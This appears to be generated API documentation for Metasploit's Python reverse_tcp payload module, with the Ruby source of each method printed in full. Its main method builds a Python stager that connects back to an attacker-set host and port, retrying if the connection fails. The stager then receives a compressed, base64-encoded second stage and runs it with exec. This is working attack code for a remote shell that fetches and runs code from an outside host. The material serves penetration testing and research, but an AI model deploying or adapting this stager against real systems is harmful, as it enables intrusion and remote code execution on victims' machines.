Module: Msf::Payload::Python::ReverseTcp

Includes:

Msf::Payload::Python, SendUUID

Included in:

ReverseTcpSsl

Defined in:

lib/msf/core/payload/python/reverse_tcp.rb

Overview

Complex reverse_tcp payload generation for Python

Instance Method Summary

• #generate(_opts = {}) ⇒ Object

  Generate the first stage.

• #generate_reverse_tcp(opts = {}) ⇒ Object
• #handle_intermediate_stage(conn, payload) ⇒ Object
• #include_send_uuid ⇒ Object

  By default, we don’t want to send the UUID, but we’ll send for certain payloads if requested.

• #initialize(*args) ⇒ Object
• #transport_config(opts = {}) ⇒ Object

Methods included from SendUUID

#py_send_uuid

Methods included from Msf::Payload::Python

create_exec_stub, #py_create_exec_stub

Instance Method Details

#generate(_opts = {}) ⇒ Object

Generate the first stage

# File 'lib/msf/core/payload/python/reverse_tcp.rb', line 24

def generate(_opts = {})
  conf = {
    port:        datastore['LPORT'],
    host:        datastore['LHOST'],
    retry_count: datastore['StagerRetryCount'],
    retry_wait:  datastore['StagerRetryWait']
  }

  generate_reverse_tcp(conf)
end

#generate_reverse_tcp(opts = {}) ⇒ Object

# File 'lib/msf/core/payload/python/reverse_tcp.rb', line 47

def generate_reverse_tcp(opts={})
  # Set up the socket
  cmd  = "import socket,zlib,base64,struct#{opts[:retry_wait].to_i > 0 ? ',time' : ''}\n"
  if opts[:retry_wait].blank? # do not retry at all (old style)
    cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
    cmd << "s.connect(('#{opts[:host]}',#{opts[:port]}))\n"
  else
    if opts[:retry_count] > 0
      cmd << "for x in range(#{opts[:retry_count].to_i}):\n"
    else
      cmd << "while 1:\n"
    end
    cmd << "\ttry:\n"
    cmd << "\t\ts=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
    cmd << "\t\ts.connect(('#{opts[:host]}',#{opts[:port]}))\n"
    cmd << "\t\tbreak\n"
    cmd << "\texcept:\n"
    if opts[:retry_wait].to_i <= 0
      cmd << "\t\tpass\n" # retry immediately
    else
      cmd << "\t\ttime.sleep(#{opts[:retry_wait]})\n" # retry after waiting
    end
  end
  cmd << py_send_uuid if include_send_uuid
  cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
  cmd << "d=s.recv(l)\n"
  cmd << "while len(d)<l:\n"
  cmd << "\td+=s.recv(l-len(d))\n"
  cmd << "exec(zlib.decompress(base64.b64decode(d)),{'s':s})\n"

  py_create_exec_stub(cmd)
end

#handle_intermediate_stage(conn, payload) ⇒ Object

# File 'lib/msf/core/payload/python/reverse_tcp.rb', line 80

def handle_intermediate_stage(conn, payload)
  conn.put([payload.length].pack("N"))
end

#include_send_uuid ⇒ Object

By default, we don’t want to send the UUID, but we’ll send for certain payloads if requested.

# File 'lib/msf/core/payload/python/reverse_tcp.rb', line 39

def include_send_uuid
  false
end

#initialize(*args) ⇒ Object

# File 'lib/msf/core/payload/python/reverse_tcp.rb', line 16

def initialize(*args)
  super
  register_advanced_options(Msf::Opt::stager_retry_options)
end

#transport_config(opts = {}) ⇒ Object

# File 'lib/msf/core/payload/python/reverse_tcp.rb', line 43

def transport_config(opts={})
  transport_config_reverse_tcp(opts)
end